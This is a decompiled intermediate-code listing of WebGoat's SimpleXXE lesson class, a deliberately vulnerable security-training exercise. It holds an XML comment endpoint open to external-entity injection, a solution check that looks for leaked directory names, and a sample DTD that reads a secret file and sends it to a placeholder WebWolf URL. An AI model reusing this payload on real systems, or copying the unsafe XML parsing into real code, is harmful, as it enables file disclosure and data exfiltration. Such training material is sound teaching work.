public class org.owasp.webgoat.lessons.xxe.SimpleXXE extends org.owasp.webgoat.container.assignments.AssignmentEndpoint
{
    private static final java.lang.String[] DEFAULT_LINUX_DIRECTORIES;
    private static final java.lang.String[] DEFAULT_WINDOWS_DIRECTORIES;
    private java.lang.String webGoatHomeDirectory;
    private java.lang.String webWolfURL;
    private org.owasp.webgoat.lessons.xxe.CommentsCache comments;

    public void <init>()
    {
        org.owasp.webgoat.lessons.xxe.SimpleXXE r0;

        r0 := @this;

        specialinvoke r0.<init>();

        return;
    }

    public org.owasp.webgoat.container.assignments.AttackResult createNewComment(javax.servlet.http.HttpServletRequest, java.lang.String)
    {
        org.owasp.webgoat.lessons.xxe.Comment $r3;
        org.owasp.webgoat.container.assignments.AttackResult$AttackResultBuilder $r5, $r6, $r8;
        javax.servlet.http.HttpServletRequest r11;
        java.lang.String r1, r12, r12_1, r12_2;
        org.owasp.webgoat.lessons.xxe.CommentsCache $r2, $r4;
        boolean $z0;
        java.lang.Exception $r10;
        org.owasp.webgoat.lessons.xxe.SimpleXXE r0;
        org.owasp.webgoat.container.assignments.AttackResult $r7, $r9;

        r0 := @this;

        r11 := @parameter0;

        r1 := @parameter1;

        r12 = "";

     label1:
        $r2 = r0.comments;

        $r3 = virtualinvoke $r2.parseXml(r1);

        $r4 = r0.comments;

        virtualinvoke $r4.addComment($r3, 0);

        $z0 = virtualinvoke r0.checkSolution($r3);

        if $z0 == 0 goto label3;

        $r8 = virtualinvoke r0.success(r0);

        $r9 = virtualinvoke $r8.build();

     label2:
        return $r9;

     label3:
(0)     goto label5;

     label4:
        $r10 := @caughtexception;

(1)     r12_1 = staticinvoke org.apache.commons.lang3.exception.ExceptionUtils.getStackTrace($r10);

     label5:
        r12_2 = Phi(r12 #0, r12_1 #1);

        $r5 = virtualinvoke r0.failed(r0);

        $r6 = virtualinvoke $r5.output(r12_2);

        $r7 = virtualinvoke $r6.build();

        return $r7;

        catch java.lang.Exception from label1 to label2 with label4;
    }

    private boolean checkSolution(org.owasp.webgoat.lessons.xxe.Comment)
    {
        org.owasp.webgoat.lessons.xxe.Comment r2;
        java.lang.String[] r0, $r5, $r5_1, $r5_2;
        int $i0, i1, i1_1, i1_2;
        java.lang.String r1, $r3;
        boolean $z0, $z1, $z2, z3, z3_1, z3_2;
        org.owasp.webgoat.lessons.xxe.SimpleXXE r4;

        r4 := @this;

        r2 := @parameter0;

        $z0 = staticinvoke org.apache.commons.exec.OS.isFamilyMac();

        if $z0 != 0 goto label1;

        $z2 = staticinvoke org.apache.commons.exec.OS.isFamilyUnix();

        if $z2 == 0 goto label2;

     label1:
        $r5_1 = org.owasp.webgoat.lessons.xxe.SimpleXXE.DEFAULT_LINUX_DIRECTORIES;

(0)     goto label3;

     label2:
(1)     $r5 = org.owasp.webgoat.lessons.xxe.SimpleXXE.DEFAULT_WINDOWS_DIRECTORIES;

     label3:
        $r5_2 = Phi($r5_1 #0, $r5 #1);

        z3 = 0;

        r0 = $r5_2;

        $i0 = lengthof $r5_2;

(2)     i1 = 0;

     label4:
        i1_1 = Phi(i1 #2, i1_2 #3);

        z3_1 = Phi(z3 #2, z3_2 #3);

        if i1_1 >= $i0 goto label5;

        r1 = r0[i1_1];

        $r3 = virtualinvoke r2.getText();

        $z1 = staticinvoke org.apache.commons.lang3.StringUtils.contains($r3, r1);

        z3_2 = z3_1 | $z1;

        i1_2 = i1_1 + 1;

(3)     goto label4;

     label5:
        return z3_1;
    }

    public java.lang.String getSampleDTDFile()
    {
        org.owasp.webgoat.lessons.xxe.SimpleXXE r0;

        r0 := @this;

        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n<!ENTITY % all \"<!ENTITY send SYSTEM \'http://replace-this-by-webwolf-base-url/landing?text=%file;\'>\">\n%all;\n";
    }

    static void <clinit>()
    {
        java.lang.String[] $r0, $r1;

        $r0 = newarray (java.lang.String)[3];

        $r0[0] = "usr";

        $r0[1] = "etc";

        $r0[2] = "var";

        org.owasp.webgoat.lessons.xxe.SimpleXXE.DEFAULT_LINUX_DIRECTORIES = $r0;

        $r1 = newarray (java.lang.String)[4];

        $r1[0] = "Windows";

        $r1[1] = "Program Files (x86)";

        $r1[2] = "Program Files";

        $r1[3] = "pagefile.sys";

        org.owasp.webgoat.lessons.xxe.SimpleXXE.DEFAULT_WINDOWS_DIRECTORIES = $r1;

        return;
    }
}
